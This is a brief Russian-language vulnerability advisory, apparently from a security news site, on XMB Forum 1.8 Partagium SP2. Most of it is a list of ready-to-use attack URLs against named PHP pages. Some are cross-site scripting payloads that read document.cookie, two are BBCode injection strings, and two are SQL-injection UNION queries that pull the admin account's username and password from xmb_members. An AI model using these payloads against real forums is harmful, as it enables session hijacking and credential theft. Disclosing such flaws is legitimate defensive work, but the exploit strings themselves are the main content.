Программа: XMB Forum 1.8 Partagium Final SP2 (Build: 2003100518) 

Несколько уязвимостей обнаружено в XMB Forum. Удаленный пользователь может выполнить SQL команды на основной базе данных и выполнить XSS нападение. 

Пример: 

http://[target]/xmb18sp2/forumdisplay.php? fid=1&foobar=<%73cript>

http://[target]/xmb18sp2/member.php?action =viewpro&member=x<%73cript>;al ert(document.cookie);</%73cript>

http://[target]/xmb18sp2/u2uadmin.php?uid=x"> <%73cript>alert(document.cookie);</%73cript>

http://[target]/xmb18sp2/editprofile.php? user=x"> <%73cript>alert(document.cookie);</%73cript>

http://[target]/xmb18sp2/viewthread.php?tid=1&ppp= x<%73cript>alert(document.cookie);</%73cript>

http://[target] /xmb18sp2/misc.php?action=list&order=postnum&desc=x

http://[target]/xmb18sp2/misc.php?action=list& order=postnum&desc=x<%73cript>alert(document.
cookie);</%73cript>

http://[target]/xmb18sp2/forumdisplay.php? fid=1&tpp=x<%73cript>alert(document.
cookie);</%73cript>

http://[target]/xmb18sp2/forumdisplay.php ?fid=1&ascdesc=x<%73cript>ale rt(document.cookie);</%73cript>

text1 [align=center onmouseover= alert(document.cookie);] text2 [/align]

text1 [img=1x1]javascript:alert(document. cookie);//gif[/img] text2

http://[target]/xmb18sp2/stats.php?action= view&addon=WHERE t.tid<0UNION ALLSELECT NULL,NULL,username FROM xmb_members WHERE
uid=1LIMIT 1/*

http://[target]/xmb18sp2/stats.php?action=view &addon=WHERE t.tid<0UNION ALL SELECT
NULL,NULL,password FROM xmb_members WHERE uid=1 LIMIT 1/*

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии